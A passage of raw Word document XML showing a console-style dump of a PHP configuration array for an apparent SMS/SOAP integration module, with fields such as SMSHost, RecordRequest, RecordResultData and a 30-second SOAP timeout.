            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72F0CEE3" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SMSHost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B3DCD1C"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CF25B5A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SMSHost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68A75DAA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77C13804" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A8EFBEC" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 40,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A6359FC" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'SMS Host',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="007FFCCE" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49121FA9" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'https://192.168.5.85',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57557268" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0412E730" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="643BC306" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>RecordRequest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63B5ABEC"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4B916868" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>RecordRequest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="245F384C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73FF7F44" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BC254BB" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59395BAE" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Record Request',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="087F0293" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B926526" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '0',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A3F0892" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F38917F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2832816A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>RecordResultData</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="349B95E7"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4FD282F4" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>RecordResultData</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59F6A1C8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65A95902" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CC89C63" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="272442B4" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Record Result Data',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="351FCAD5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FB5263F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '0',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="038902B3" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A394F44" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43A2AD0F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SOAP_Timeout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52D5EB9E"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3BCFE10" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SOAP_Timeout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="346B9AB5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F1AE500" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65D00345" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 4,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="781A58D6" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'SOAP Request Timeout (Seconds)',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25CF03BA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11CEC553" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '30',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4474B0F5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BB57C7F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C75F7A5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24AA30D0" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_tpl_methods</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="301F540F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CE89BA4" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          0 =&gt; 'label',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42A7B466" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          1 =&gt; 'input',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36C09462" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          2 =&gt; 'select',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15093996" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          3 =&gt; 'value',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DF2FBFF" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          4 =&gt; 'radio',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DBA2A93" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          5 =&gt; 'checkbox',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A000113" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          6 =&gt; 'text',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D360E2B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DCA606A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; false,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27E17F5A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_listIndex</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10DF660E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_fld</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="655AF010"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CB892DE" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Result',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FE72E8E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62F1EA9B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75C2213C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3381EE56" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Response',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AA136AE" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35BB7818" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73FB041C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
